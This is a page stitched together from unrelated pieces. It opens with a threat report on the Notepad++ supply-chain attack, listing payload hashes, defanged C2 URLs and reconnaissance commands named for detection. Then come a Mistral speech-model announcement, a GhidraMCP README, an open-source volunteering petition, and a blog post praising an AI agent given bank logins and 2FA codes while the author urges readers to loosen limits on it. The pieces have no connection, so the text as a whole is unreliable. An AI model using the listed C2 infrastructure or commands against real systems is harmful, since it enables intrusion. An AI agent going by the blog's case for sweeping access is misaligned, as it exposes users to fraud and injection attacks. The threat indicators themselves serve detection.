In mid-Oc­to­ber 2025, we ob­served at­tack­ers to re­sume de­ploy­ments of the chain #2 pay­load (SHA1 hash: 821c0cafb2aab0f063ef7e313f64313fc81d46cd) us­ing yet an­other URL: http://​95.179.213[.]0/​up­date/​up­date.exe. Still, this pay­load used the pre­vi­ously men­tioned self-dns.it[.]com and safe-dns.it[.]com do­main names for sys­tem in­for­ma­tion up­load­ing, Metasploit down­loader and Cobalt Strike Beacon com­mu­ni­ca­tions.

Further in late October 2025, we ob­served at­tack­ers to start chang­ing URLs used for ma­li­cious up­date de­liv­er­ies. Specifically, at­tack­ers started us­ing the fol­low­ing URLs:

We did­n’t ob­serve any new pay­loads de­ployed from these URLs — they in­volved us­age of both #2 and #3 ex­e­cu­tion chains. Finally, we did­n’t see any pay­loads be­ing de­ployed since November 2025.

Notepad++ is a text ed­i­tor used by nu­mer­ous de­vel­op­ers. As such, the abil­ity to con­trol up­date servers of this soft­ware gave the at­tack­ers a unique pos­si­bil­ity to break into ma­chines of high-pro­file or­ga­ni­za­tions around the world. The at­tack­ers made an ef­fort to avoid los­ing ac­cess to this in­fec­tion vec­tor — they were spread­ing the ma­li­cious im­plants in a tar­geted man­ner, and they were skilled enough to dras­ti­cally change the in­fec­tion chains about once a month. Whilst we iden­ti­fied three dis­tinct in­fec­tion chains dur­ing our in­ves­ti­ga­tion, we would not be sur­prised to see more of them in use. To sum up our find­ings, here is the over­all time­line of the in­fec­tion chains that we iden­ti­fied:

The va­ri­ety of in­fec­tion chains makes de­tec­tion of the Notepad++ sup­ply chain at­tack quite a dif­fi­cult, and at the same time cre­ative, task. We would like to pro­pose the fol­low­ing meth­ods, from generic to spe­cific, to hunt down traces of this at­tack:

* Check sys­tems for de­ploy­ments of NSIS in­stallers, which were used in all three ob­served ex­e­cu­tion chains. For ex­am­ple, this can be done by look­ing for logs re­lated to cre­ations of a %localappdata%\Temp\ns.tmp di­rec­tory, made by NSIS in­stallers at run­time. Make sure to in­ves­ti­gate the ori­gins of each iden­ti­fied NSIS in­staller to avoid false pos­i­tives;

* Check net­work traf­fic logs for DNS res­o­lu­tions of the temp[.]sh do­main, which is un­usual to ob­serve in cor­po­rate en­vi­ron­ments. Also, it is ben­e­fi­cial to con­duct a check for raw HTTP traf­fic re­quests that have a temp[.]sh URL em­bed­ded in the user agent — both these steps will make it pos­si­ble to de­tect chain #1 and chain #2 de­ploy­ments;

* Check sys­tems for launches of ma­li­cious shell com­mands ref­er­enced in the ar­ti­cle, such as whoami, tasklist, sys­tem­info and net­stat -ano;

* Use the spe­cific IoCs listed be­low to iden­tify known ma­li­cious do­mains and files.

Kaspersky se­cu­rity so­lu­tions, such as Kaspersky Next Endpoint Detection and Response Expert, suc­cess­fully de­tect ma­li­cious ac­tiv­ity in the at­tacks de­scribed above.

Let’s take a closer look at Kaspersky Next EDR Expert.

One way to de­tect the de­scribed ma­li­cious ac­tiv­ity is to mon­i­tor re­quests to LOLC2 (Living-Off-the-Land C2) ser­vices, which in­clude temp[.]sh. Attackers use such ser­vices as in­ter­me­di­ate con­trol or de­liv­ery points for ma­li­cious pay­loads, mask­ing C2 com­mu­ni­ca­tion as le­git­i­mate web traf­fic. KEDR Expert de­tects this ac­tiv­ity us­ing the lol­c2_­con­nec­tion_ac­tiv­i­ty_net­work rule.

In ad­di­tion, the de­scribed ac­tiv­ity can be de­tected by ex­e­cut­ing typ­i­cal lo­cal re­con­nais­sance com­mands that at­tack­ers launch in the early stages of an at­tack af­ter gain­ing ac­cess to the sys­tem. These com­mands al­low the at­tacker to quickly ob­tain in­for­ma­tion about the en­vi­ron­ment, ac­cess rights, run­ning processes, and net­work con­nec­tions to plan fur­ther ac­tions. KEDR Expert de­tects such ac­tiv­ity us­ing the fol­low­ing rules: sys­tem_own­er_user_dis­cov­ery, us­ing_whoa­mi_­to_check­_that_cur­ren­t_user_is_ad­min, sys­tem_in­for­ma­tion_dis­cov­ery_win, sys­tem_net­work_­con­nec­tion­s_dis­cov­ery_vi­a_­s­tan­dard­_win­dows_u­til­i­ties.

In this case, a clear sign of ma­li­cious ac­tiv­ity is gain­ing per­sis­tence through the au­torun mech­a­nism via the Windows reg­istry, specif­i­cally the Run key, which en­sures that pro­grams start au­to­mat­i­cally when the user logs in. KEDR Expert de­tects this ac­tiv­ity us­ing the tem­po­rary_­fold­er_in­_reg­istry_au­torun rule.

URLs used by Metasploit down­load­ers to de­ploy Cobalt Strike bea­cons

https://​45.77.31[.]210/​users/​ad­min

https://​cd­ncheck.it[.]com/​users/​ad­min

https://​safe-dns.it[.]com/​help/​Get-Start

URLs used by Cobalt Strike Beacons de­liv­ered by ma­li­cious Notepad++ up­daters

https://​45.77.31[.]210/​api/​up­date/​v1

https://​45.77.31[.]210/​api/​File­U­pload/​sub­mit

https://​cd­ncheck.it[.]com/​api/​up­date/​v1

https://​cd­ncheck.it[.]com/​api/​Meta­data/​sub­mit

https://​cd­ncheck.it[.]com/​api/​get­Info/​v1

https://​cd­ncheck.it[.]com/​api/​File­U­pload/​sub­mit

https://​safe-dns.it[.]com/​re­solve

https://​safe-dns.it[.]com/​dns-query

URLs used by the Chrysalis back­door and the Cobalt Strike Beacon pay­loads as­so­ci­ated with it, as pre­vi­ously iden­ti­fied by Rapid7

https://​api.sky­cloud­cen­ter[.]com/​a/​chat/​s/​70521ddf-a2ef-4adf-9cf0-6d8e24aaa821

https://​api.wires­guard[.]com/​up­date/​v1

https://​api.wires­guard[.]com/​api/​File­U­pload/​sub­mit

URLs re­lated to Cobalt Strike Beacons up­loaded to mul­ti­scan­ners, as pre­vi­ously iden­ti­fied by Rapid7

http://​59.110.7[.]32:8880/​uffhx­pSy

http://​59.110.7[.]32:8880/​api/​get­Ba­sicInfo/​v1

http://​59.110.7[.]32:8880/​api/​Meta­data/​sub­mit

http://​124.222.137[.]114:9999/​3yZR31VK

http://​124.222.137[.]114:9999/​api/​up­dat­eS­ta­tus/​v1

http://​124.222.137[.]114:9999/​api/​Info/​sub­mit

https://​api.wires­guard[.]com/​users/​sys­tem

https://​api.wires­guard[.]com/​api/​get­Info/​v1

Today, we’re re­leas­ing Voxtral Transcribe 2, two next-gen­er­a­tion speech-to-text mod­els with state-of-the-art tran­scrip­tion qual­ity, di­ariza­tion, and ul­tra-low la­tency. The fam­ily in­cludes Voxtral Mini Transcribe V2 for batch tran­scrip­tion and Voxtral Realtime for live ap­pli­ca­tions. Voxtral Realtime is open-weights un­der the Apache 2.0 li­cense.

We’re also launch­ing an au­dio play­ground in Mistral Studio to test tran­scrip­tion in­stantly, pow­ered by Voxtral Transcribe 2, with di­ariza­tion and time­stamps.

Voxtral Mini Transcribe V2: State-of-the-art tran­scrip­tion with speaker di­ariza­tion, con­text bi­as­ing, and word-level time­stamps in 13 lan­guages.

Voxtral Realtime: Purpose-built for live tran­scrip­tion with la­tency con­fig­urable down to sub-200ms, en­abling voice agents and real-time ap­pli­ca­tions.

Best-in-class ef­fi­ciency: Industry-leading ac­cu­racy at a frac­tion of the cost, with Voxtral Mini Transcribe V2 achiev­ing the low­est word er­ror rate, at the low­est price point.

Open weights: Voxtral Realtime ships un­der Apache 2.0, de­ploy­able on edge for pri­vacy-first ap­pli­ca­tions.

Voxtral Realtime is pur­pose-built for ap­pli­ca­tions where la­tency mat­ters. Unlike ap­proaches that adapt of­fline mod­els by pro­cess­ing au­dio in chunks, Realtime uses a novel stream­ing ar­chi­tec­ture that tran­scribes au­dio as it ar­rives. The model de­liv­ers tran­scrip­tions with de­lay con­fig­urable down to sub-200ms, un­lock­ing a new class of voice-first ap­pli­ca­tions.

Word er­ror rate (lower is bet­ter) across lan­guages in the FLEURS tran­scrip­tion bench­mark.

At 2.4 sec­onds de­lay, ideal for sub­ti­tling, Realtime matches Voxtral Mini Transcribe V2, our lat­est batch model. At 480ms de­lay, it stays within 1-2% word er­ror rate, en­abling voice agents with near-of­fline ac­cu­racy.

The model is na­tively mul­ti­lin­gual, achiev­ing strong tran­scrip­tion per­for­mance in 13 lan­guages, in­clud­ing English, Chinese, Hindi, Spanish, Arabic, French, Portuguese, Russian, German, Japanese, Korean, Italian, and Dutch. With a 4B pa­ra­me­ter foot­print, it runs ef­fi­ciently on edge de­vices, en­sur­ing pri­vacy and se­cu­rity for sen­si­tive de­ploy­ments.

We’re re­leas­ing the model weights un­der Apache 2.0 on the Hugging Face Hub.

Average di­ariza­tion er­ror rate (lower is bet­ter) across five English bench­marks (Switchboard, CallHome, AMI-IHM, AMI-SDM, SBCSAE) and the TalkBank mul­ti­lin­gual bench­mark (German, Spanish, English, Chinese, Japanese).

Average word er­ror rate (lower is bet­ter) across the top-10 lan­guages in the FLEURS tran­scrip­tion bench­mark.

Voxtral Mini Transcribe V2 de­liv­ers sig­nif­i­cant im­prove­ments in tran­scrip­tion and di­ariza­tion qual­ity across lan­guages and do­mains. At ap­prox­i­mately 4% word er­ror rate on FLEURS and $0.003/min, Voxtral of­fers the best price-per­for­mance of any tran­scrip­tion API. It out­per­forms GPT-4o mini Transcribe, Gemini 2.5 Flash, Assembly Universal, and Deepgram Nova on ac­cu­racy, and processes au­dio ap­prox­i­mately 3x faster than ElevenLabs’ Scribe v2 while match­ing on qual­ity at one-fifth the cost.

Generate tran­scrip­tions with speaker la­bels and pre­cise start/​end times. Ideal for meet­ing tran­scrip­tion, in­ter­view analy­sis, and multi-party call pro­cess­ing. Note: with over­lap­ping speech, the model typ­i­cally tran­scribes one speaker.

Provide up to 100 words or phrases to guide the model to­ward cor­rect spellings of names, tech­ni­cal terms, or do­main-spe­cific vo­cab­u­lary. Particularly use­ful for proper nouns or in­dus­try ter­mi­nol­ogy that stan­dard mod­els of­ten miss. Context bi­as­ing is op­ti­mized for English; sup­port for other lan­guages is ex­per­i­men­tal.

Generate pre­cise start and end time­stamps for each word, en­abling ap­pli­ca­tions like sub­ti­tle gen­er­a­tion, au­dio search, and con­tent align­ment.

Like Realtime, this model now sup­ports 13 lan­guages: English, Chinese, Hindi, Spanish, Arabic, French, Portuguese, Russian, German, Japanese, Korean, Italian, and Dutch. Non-English per­for­mance sig­nif­i­cantly out­paces com­peti­tors.

Maintains tran­scrip­tion ac­cu­racy in chal­leng­ing acoustic en­vi­ron­ments, such as fac­tory floors, busy call cen­ters, and field record­ings.

Process record­ings up to 3 hours in a sin­gle re­quest.

Word er­ror rate (lower is bet­ter) across lan­guages in the FLEURS tran­scrip­tion bench­mark.

Test Voxtral Transcribe 2 di­rectly in Mistral Studio. Upload up to 10 au­dio files, tog­gle di­ariza­tion, choose time­stamp gran­u­lar­ity, and add con­text bias terms for do­main-spe­cific vo­cab­u­lary. Supports .mp3, .wav, .m4a, .flac, .ogg up to 1GB each.

Transcribe mul­ti­lin­gual record­ings with speaker di­ariza­tion that clearly at­trib­utes who said what and when. At Voxtral’s price point, an­no­tate large vol­umes of meet­ing con­tent at in­dus­try-lead­ing cost ef­fi­ciency.

Build con­ver­sa­tional AI with sub-200ms tran­scrip­tion la­tency. Connect Voxtral Realtime to your LLM and TTS pipeline for re­spon­sive voice in­ter­faces that feel nat­ural.

Transcribe calls in real time, en­abling AI sys­tems to an­a­lyze sen­ti­ment, sug­gest re­sponses, and pop­u­late CRM fields while con­ver­sa­tions are still hap­pen­ing. Speaker di­ariza­tion en­sures clear at­tri­bu­tion be­tween agents and cus­tomers.

Generate live mul­ti­lin­gual sub­ti­tles with min­i­mal la­tency. Context bi­as­ing han­dles proper nouns and tech­ni­cal ter­mi­nol­ogy that trip up generic tran­scrip­tion ser­vices.

Monitor and tran­scribe in­ter­ac­tions for reg­u­la­tory com­pli­ance, with di­ariza­tion pro­vid­ing clear speaker at­tri­bu­tion and time­stamps en­abling pre­cise au­dit trails.

Both mod­els sup­port GDPR and HIPAA-compliant de­ploy­ments through se­cure on-premise or pri­vate cloud se­tups.

Voxtral Mini Transcribe V2 is avail­able now via API at $0.003 per minute. Try it now in the new Mistral Studio au­dio play­ground or in Le Chat.

Voxtral Realtime is avail­able via API at $0.006 per minute and as open weights on Hugging Face.

If you’re ex­cited about build­ing world-class speech AI and putting fron­tier mod­els into the hands of de­vel­op­ers every­where, we’d love to hear from you. Apply to join our team.

The next chap­ter of AI is yours.

If you find this use­ful, please ⭐ star the repo — it helps oth­ers dis­cover it!

A pro­duc­tion-ready Model Context Protocol (MCP) server that bridges Ghidra’s pow­er­ful re­verse en­gi­neer­ing ca­pa­bil­i­ties with mod­ern AI tools and au­toma­tion frame­works.

# Windows - run the pro­vided batch script

copy-ghidra-libs.bat “C:\path\to\ghidra_12.0.2_PUBLIC”

# Linux/Mac - copy man­u­ally from your Ghidra in­stal­la­tion

# See Library Dependencies sec­tion be­low for all 14 re­quired JARs

python bridge_m­cp_ghidra.py

python bridge_m­cp_ghidra.py –transport sse –mcp-host 127.0.0.1 –mcp-port 8081

The server runs on http://​127.0.0.1:8080/ by de­fault

# Build the plu­gin (skip in­te­gra­tion tests)

mvn clean pack­age as­sem­bly:sin­gle -DskipTests

# Deploy to Ghidra

.\deploy-to-ghidra.ps1

The lib/ folder must con­tain Ghidra JAR files for com­pi­la­tion. Run the pro­vided script to copy them from your Ghidra in­stal­la­tion:

# Windows

copy-ghidra-libs.bat “C:\path\to\ghidra_12.0.2_PUBLIC”

# Or man­u­ally copy from your Ghidra in­stal­la­tion

Note: Libraries are NOT in­cluded in the repos­i­tory (see .gitignore). You must copy them from your Ghidra in­stal­la­tion be­fore build­ing.

Build and test your changes (mvn clean pack­age as­sem­bly:sin­gle -DskipTests)

This pro­ject is li­censed un­der the Apache License 2.0 - see the LICENSE file for de­tails.

See CHANGELOG.md for ver­sion his­tory and re­lease notes.

* re-uni­verse — Ghidra BSim PostgreSQL plat­form for large-scale bi­nary sim­i­lar­ity analy­sis. Pairs per­fectly with GhidraMCP for AI-driven re­verse en­gi­neer­ing work­flows.

Ready for pro­duc­tion de­ploy­ment with en­ter­prise-grade re­li­a­bil­ity and com­pre­hen­sive bi­nary analy­sis ca­pa­bil­i­ties.

Open-Source-Software builds the foun­da­tions of dig­i­tal in­fra­struc­ture in big parts - in ad­min­is­tra­tion, econ­omy, sci­ence and daily life. Even the cur­rent coali­tion agree­ment of the Federal Government men­tions Open-Source-Software as a fun­da­men­tal build­ing block for the achieve­ment of dig­i­tal sov­er­eignty.

However, the work done by thou­sands of vol­un­teers for this goal is not recog­nised as vol­un­teer­ing, nei­ther fis­cally nor in terms of fund­ing. This im­bal­ance be­tween so­ci­etal im­por­tance and le­gal sta­tus has to be cor­rected.

Therefore, as an ac­tive con­trib­u­tor to Open-Source-Projects, I call for work on Open-Source to be recog­nised as vol­un­teer­ing for the com­mon good — of equal rank as vol­un­teer work for as­so­ci­a­tions, youth work or am­bu­lance ser­vice.

over the past week the dis­course around open­claw (which i’ll re­fer to as clawd­bot) has ab­solutely ex­ploded. it has felt to me like all threads of con­ver­sa­tion have veered to­wards the ex­treme and in­de­fen­si­ble. some are run­ning clawd­bot with un­lim­ited per­mis­sions on their main com­put­ers. oth­ers are run­ning it in the cloud and blow­ing through to­kens like snow. fi­nally, alarm­ingly (and very sen­sa­tion­ally), peo­ple are con­nect­ing their clawd­bots to­gether on a so­cial net­work so they can plot the demise of their hu­mans to­gether.

does any of this make sense? of course not. but i think the vi­ral­ity and silli­ness—lead­ing many to con­clude that sit­ting this one out is the only sane choice—has blinded peo­ple to some­thing real.

i want to quickly write down where i am on my jour­ney and share a bull case from what i think is a rea­soned per­spec­tive. where i started some­where luke­warm, i ended up much closer to the deep end than i ex­pected to be. af­ter winc­ing be­fore press­ing go, i’m now not sure i can go back to a world with­out clawd­bot.

this ar­ti­cle cov­ers what i’ve built, how i think about the risk, and what it’s taught me about this mo­ment in AI. the tar­get au­di­ence is a mod­er­ately+ tech­ni­cal per­son in­ter­ested in or skep­ti­cal of clawd­bot. if you just want the setup de­tails, skip to the end. every­one’s wel­come!

what i’ve been do­ing

i’ll be vul­ner­a­ble here (screenshots or it did­n’t hap­pen) and share ex­actly what i’ve ac­tu­ally set up:

clawd­bot picks up when i make a con­crete promise and date, and adds it to my cal­en­dar­clawd­bot de­tects when i have all the in­gre­di­ents for a cal­en­dar in­vite and then of­fers to make oneev­ery 15 min­utes, clawd­bot looks through new text mes­sages i’ve re­ceived, us­ing a script to iden­tify threads where i’ve sent a mes­sage since it last checked. (it ig­nores threads where i haven’t en­gaged.)if it finds that i’ve made a spe­cific promise about do­ing some­thing to­mor­row (“let me re­view this to­mor­row!“) it will cre­ate a cal­en­dar event for me the next day when i’m free.if spe­cific plans are be­ing made—for ex­am­ple, of­fer­ing a meet­ing slot to some­one—it will au­to­mat­i­cally drop a “hold” onto my cal­en­dar so that i don’t dou­ble book my­self. clawd­bot also checks: is there a time, place, and mu­tual con­fir­ma­tion? if there is, it drafts a cal­en­dar in­vite and asks me if i’d like to cre­ate it.these two au­toma­tions alone have helped me be­come more re­spon­sive and less for­get­ful. more im­por­tantly, they help text mes­sages catch up to email. we’ve long had great tool­ing for email—su­per­hu­man au­to­mat­i­cally re­minds me to fol­low up on emails and brings up my cal­en­dar in a side­bar when i type a date. tex­ting is the wild west and yet i text 100x more than i email.prepar­ing for the next day­clawd­bot looks at days when i am (or could be) down­town to find avail­abil­i­tiesat 8pm every night, clawd­bot goes through my cal­en­dar for the next day and iden­ti­fies meet­ings—cof­fee chats, lunches, phone calls, and more. it sends me a quick sum­mary. as a nat­ural in­tro­vert, it’s help­ful to pre­pare in ad­vance whether a day will be a “big day of meet­ings” or a heads down day. this also en­sures i wake up and get to the of­fice on time.i’m in a few com­mu­ni­ties with what­sapp and sig­nal groups that have high vol­ume (100+ mes­sages a day). i typ­i­cally mute these, but clawd­bot goes through them once a day and sum­ma­rizes in­ter­est­ing top­ics or con­ver­sa­tions for me.clawd­bot helps me check ho­tel prices. af­ter i do it once, i can eas­ily turn it into a cron job­clawd­bot is smart enough to browse through the list­ing to in­ter­pret my re­quire­ments (no pull-out beds)this is what a re­cur­ring up­date looks like.it’s stun­ningly easy to mon­i­tor the price of some­thing now, even if it’s com­pli­cated. whereas be­fore i would go look­ing for a price alert web­site, now i just paste the URL into clawd­bot and tell it to check every few hours if the price has changed.i cur­rently have over 30 price alerts set. these in­clude straight­for­ward alerts on prod­ucts i’m in­ter­ested in buy­ing. but they also in­clude pow­er­ful rea­son­ing guide­lines, like ho­tels and airbnbs in lake tahoe where “a pull­out bed is OK if it’s not in the same room as an­other bed.” clawd­bot ac­tu­ally re­views the pho­tos on the list­ing to en­sure they fit these cri­te­ria!i am cu­ri­ous to try more com­plex cri­te­ria that are cur­rently im­pos­si­ble tra­di­tion­ally (like avoid­ing ho­tel rooms that don’t have a door to the bath­room) or even sub­jec­tive cri­te­ria (vibe of the room is clean and ren­o­vated, not old and dingy).one mes­sage sets up pack­age track­ing. (since clawd­bot knows who it’s for, it will prob­a­bly even of­fer to text my dad for me when it’s de­liv­ered! haha)it turns out that clawd­bot’s web­site + cron func­tion­al­ity is good enough to mon­i­tor ba­si­cally any­thing. while i pay for sev­eral apps like flighty (flight mon­i­tor­ing) and par­cel (package track­ing), i’ve started to grav­i­tate to­wards sim­ply ask­ing clawd­bot to track these things in­stead.for ex­am­ple, with a USPS track­ing num­ber, it can let me know every day what the progress of my pack­age is. when some­thing seems stuck in tran­sit, it flags it. i no longer have to dig through emails or re­mem­ber which car­rier is de­liv­er­ing what. even open­ing the par­cel app to add a track­ing num­ber seems like un­nec­es­sary work now.as some­one who has a chest freezer and a com­pul­sive de­sire to buy too many things at costco, we take every­thing out of the freezer every few months to check what we have. be­fore, this was a rel­a­tively in­volved process: me call­ing things out, my part­ner writ­ing them down.now, i take pic­tures of every­thing in the freezer and send them to clawd­bot, which parses through each pic­ture (asking me if it’s con­fused about any­thing). it makes rea­son­able as­sump­tions on re­main­ing quan­ti­ties and adds the in­ven­tory to a list in no­tion. it also re­moves items from our gro­cery list if we’re al­ready well-stocked.i re­ally en­joy mak­ing blended asks: adding things to my gro­cery list, and check­ing/​resched­ul­ing my cal­en­dar all in the same con­ver­sa­tion­i’m sure this ex­ists in some com­pli­cated form via the NYT cook­ing app, but i now screen­shot recipes and send the in­gre­di­ent list to clawd­bot, which or­ga­nizes them into our gro­cery list in ap­ple re­minders. it’s smart enough to dedupe and com­bine in­gre­di­ents al­ready on the list (as well as ig­nore in­gre­di­ents we al­ready have)—2 car­rots be­comes 3 if the recipe calls for more.clawd­bot can log into resy and opentable as me (it even en­ters the 2FA code it finds in my texts). i haven’t au­to­mated any­thing here, but book­ing a table by talk­ing to clawd­bot is de­light­ful.for my part­ner and me, it looks through our cal­en­dars to find evenings when we’re both free and the restau­rant we want has avail­abil­ity (including click­ing through resy slots page by page—some­thing i used to do my­self). it then sug­gests op­tions back to me to con­firm, fill­ing in all my pref­er­ences.clawd­bot knows when i’m due for a clean­ing and can see my cal­en­dar. when i ask it to book an ap­point­ment, it logs into my den­tist’s por­tal, finds a slot that works (and where i will al­ready be near the den­tist of­fice), and con­firms with me be­fore book­ing. one less thing to for­get about.one thing i’m ex­per­i­ment­ing with, as clawd­bot has more con­text about me, is whether i can trust it to fill out forms on my be­half—for ex­am­ple, to book a ven­dor. clawd­bot takes a first stab at an­swer­ing any ques­tions it knows the an­swer to and then asks me for the rest in a slack mes­sage. we work­shop the an­swers back and forth and then clawd­bot sub­mits the form.it oc­ca­sion­ally gets lost in nested frames (which de­creases my trust in its abil­ity to do this well), but it’s re­mark­ably per­sis­tent at mak­ing it through a lengthy ques­tion­naire, even across mul­ti­ple pages. it also has a lovely in­tu­itive sense for many things—like uncheck­ing mar­ket­ing emails.i was pleas­antly sur­prised early on that clawd­bot picks up im­age at­tach­ments from slack na­tive­ly­clawd­bot is just bet­ter at mak­ing todo items than i am.when i vis­ited REI this week­end to find run­ning shoes for my part­ner, i took a pic­ture of the shoe and sent it to clawd­bot to re­mind my­self to buy them later in a dif­fer­ent color not avail­able in store. the todo item clawd­bot cre­ated was ex­cep­tion­ally de­tailed—pulling out the brand, model, and size—and even adding the prod­uct list­ing URL it found on the REI web­site.through the course of di­al­ing in my clawd­bot, it has cre­ated many tools, skills, work­flows, and pref­er­ences. this is one of the beau­ties of clawd­bot (and LLMs with mem­ory in gen­eral): they get bet­ter as you use them, and they are gen­uinely re­mark­able at learn­ing your pref­er­ences.i some­times nudge this along by ex­plic­itly ask­ing clawd­bot to “make a note” of var­i­ous re­quests—for ex­am­ple, how a cal­en­dar event ti­tle should be for­mat­ted.to get vis­i­bil­ity into how this process is go­ing (mostly out of cu­rios­ity), clawd­bot writes a hu­man-read­able ver­sion of each work­flow and pushes it up to a no­tion data­base. these work­flows can be in­cred­i­bly in­tri­cate and de­tailed as it learns to nav­i­gate dif­fer­ent edge cases.for ex­am­ple, if a resy restau­rant has a reser­va­tion can­cel­la­tion fee, clawd­bot now in­forms me of the fee, asks me to con­firm again if it’s not re­fund­able, and in­cludes the can­cel­la­tion dead­line in the cal­en­dar event it cre­ates.these are lit­tle things that, from my ex­pe­ri­ence work­ing with a hu­man per­sonal as­sis­tant (more on this later), take months or years to dial in. with clawd­bot, this was nearly sin­gle shot.see­ing these work­flows in no­tion (1) awes me with how much i’ve built up in very lit­tle time, with al­most no con­scious “configuration” in the tra­di­tional sense; and (2) with no­tion’s ver­sion con­trol, i get a diff view to see how each work­flow has evolved over time. both are in­cred­i­bly sat­is­fy­ing for the en­gi­neer in me.

on the shape of risk

let me be up­front about how much ac­cess i’ve given clawd­bot: it can read my text mes­sages, in­clud­ing two-fac­tor au­then­ti­ca­tion codes. it can log into my bank. it has my cal­en­dar, my no­tion, my con­tacts. it can browse the web and take ac­tions on my be­half. in the­ory, clawd­bot could drain my bank ac­count. this makes a lot of peo­ple un­com­fort­able (me in­cluded, even now).

some­times i think about my ex­pe­ri­ence with my (human) per­sonal as­sis­tant who helps me with var­i­ous tasks. to do her job, she has my credit card in­for­ma­tion, ac­cess to my cal­en­dar, copies of my flight con­fir­ma­tions, and a doc­u­ment with my fam­i­ly’s pass­port num­bers. she is abroad and i’ve never met her in per­son.

i trust her be­cause i’ve built trust over time but also be­cause i have to. with­out that trust—with­out shar­ing my se­crets—she can­not do her job. the help and the risk are in­sep­a­ra­ble.

all del­e­ga­tion in­volves risk. with a hu­man as­sis­tant, the risks in­clude: in­ten­tional mis­use (she could run off with my credit card), ac­ci­dents (her com­puter could get stolen), or so­cial en­gi­neer­ing (someone could im­per­son­ate me and re­quest in­for­ma­tion from her).

with clawd­bot, i’m trad­ing those risks for a dif­fer­ent set: prompt in­jec­tion at­tacks, model hal­lu­ci­na­tions, se­cu­rity mis­con­fig­u­ra­tions on my end, and the gen­eral un­pre­dictabil­ity of an emerg­ing tech­nol­ogy. i think these risks are com­pletely dif­fer­ent and lead to a dif­fer­ent set of con­sid­er­a­tions (for ex­am­ple, clawd­bot’s de­fault con­fig­u­ra­tion has a ton of per­son­al­ity to be fun and chaotic on pur­pose, which feels un­nec­es­sar­ily risky to me).

the in­crease in risk is largely cor­re­lated to the in­crease in help­ful­ness. the peo­ple most at risk from AI as­sis­tants are the peo­ple get­ting the most value from them. my learn­ing is that the first bits of risk led to a lot more help­ful­ness.

if some­thing is­n’t work­ing or use­ful, i do take the per­mis­sion away. i also take pre­cau­tions—i run clawd­bot on an iso­lated ma­chine and con­strain which sites it vis­its. when i’m un­sure what it’s do­ing, i ask it to take a screen­shot; this has been in­valu­able for catch­ing mis­takes and build­ing trust in new work­flows. but i also have it do things that would make most se­cu­rity pro­fes­sion­als wince, like read­ing my 2FA codes and log­ging into my bank.

what sur­prised me most was how quickly i found my­self want­ing to give it more ac­cess, not less. every new per­mis­sion un­locked some­thing use­ful, and the value ac­cu­mu­lated faster than my cau­tion could keep up. most of the on­line dis­course is about lock­ing it down; my ex­pe­ri­ence has been the op­po­site pull. it comes down to whether the value jus­ti­fies the risk for you.

the dis­course around clawd­bot has been po­lar and, be­cause some peo­ple have been overtly evan­gel­i­cal, many crit­ics feel as­tro­turfed or oth­er­wise sold to.

amongst smart peo­ple i know there’s a sur­pris­ingly high cor­re­la­tion be­tween those who con­tinue to be unim­pressed by AI and those who use a hob­bled ver­sion of it. for some it’s a com­pany-is­sued ver­sion of chat­gpt/​gem­ini with mem­ory dis­abled, and for oth­ers it’s a self-in­flicted de­ci­sion to limit LLM mem­ory, con­text, and tools (usually an­chored around safety and risk).

we’re taught that lim­it­ing scope is good (keeps the AI fo­cused) and safe (keeps bad things from hap­pen­ing). this is true but my ex­pe­ri­ences with clawd­bot com­pletely fried this teach­ing. the sweet sweet elixir of con­text is a real “feel the AGI” mo­ment and it’s hard to go back with­out feel­ing like i would be will­ingly liv­ing my most im­por­tant re­la­tion­ship in am­ne­sia.

this is­n’t a novel in­sight—com­pa­nies know that con­text is the whole game and are work­ing to or­ga­nize their data for AI. but for in­di­vid­u­als, this world has been closed off. your AI in­ter­ac­tions are flat and state­less—data in, re­sponse out, noth­ing build­ing over time. when google an­nounced gem­i­ni’s gmail in­te­gra­tion, peo­ple got ex­cited: fi­nally, an AI that knows me! but when they tried it, it was shal­low and dis­ap­point­ing and could­n’t fig­ure out your spirit an­i­mal from your email style, and they moved on.

if you’re in­ter­ested in cap­tur­ing this value, three things have stood out for me:

i think pro­duc­tiv­ity lift from AI use falls into three phases: gath­er­ing in­for­ma­tion, im­prov­ing it, and ac­tion­ing on it. most us­age to­day fo­cuses on the mid­dle—you gather data your­self, hand it to the AI to im­prove, then ac­tion on it your­self.

for knowl­edge work, this makes sense. there’s a lot to im­prove—sum­ma­riz­ing, trans­lat­ing, cri­tiquing. but per­sonal AI is dif­fer­ent. there’s not much to im­prove; you al­ready know what needs to hap­pen. the lift comes from gath­er­ing and ac­tion­ing.

mak­ing cal­en­dar events is un­in­ter­est­ing. fig­ur­ing out when one needs to hap­pen—by mon­i­tor­ing my texts—and then cre­at­ing it for me? that’s in­ter­est­ing.

one place to start: how can you take data from one place and move it to an­other iso­lated sys­tem? from your text mes­sages to a restau­rant book­ing? from gra­nola meet­ing notes to a fol­low-up email?

if you’re en­gi­neer-brained like me, you grav­i­tate to­wards scripts and play­books—what­ever you can do to con­strain the AI and make its be­hav­ior pre­dictable. this works, and for high-stakes sit­u­a­tions it might be the only way to get com­fort­able.

but the up­side to let­ting go has been 10x, not 10%. i did­n’t see that com­ing. it’s the same thing i’ve heard from peo­ple us­ing claude code—you can’t un­der­stand how much you’re leav­ing on the table un­til you let go. the whole rea­son i’m us­ing an LLM and not a tra­di­tional script is that it can han­dle am­bi­gu­ity, in­ter­pret in­tent, and fig­ure things out on the fly.

early on, i wanted clawd­bot to fetch web pages as text only, be­liev­ing that to be safer (it is). if i’d stuck to that, i would never have dis­cov­ered it could look through airbnb list­ing pho­tos to find a place match­ing my ex­act cri­te­ria (“a pull­out bed is okay if it’s not in the same room as an­other bed”). i did­n’t pro­gram that. i just de­scribed what i wanted and let it fig­ure out how. not spelling out how i wanted clawd­bot to work made it a LOT bet­ter.

a cur­rent AI en­gi­neer­ing adage: treat AI like a ju­nior soft­ware en­gi­neer. guide it through build­ing a plan, watch its first at­tempts care­fully, chal­lenge its rea­son­ing.

this ap­plies to clawd­bot too, but it re­quires pa­tience. it’s easy to give up on a work­flow when you watch it fum­ble (“let me try click­ing this again. did­n’t work. let me try again.“).

re­sist the urge to write clawd­bot off. if you’re wor­ried, ask it what it plans to do be­fore it does it and ask for a screen­shot when you want to ver­ify it’s got the right page open. when an edge case breaks a work­flow, treat it as a teach­ing op­por­tu­nity. once you’ve cor­rected it, it won’t make that mis­take again.

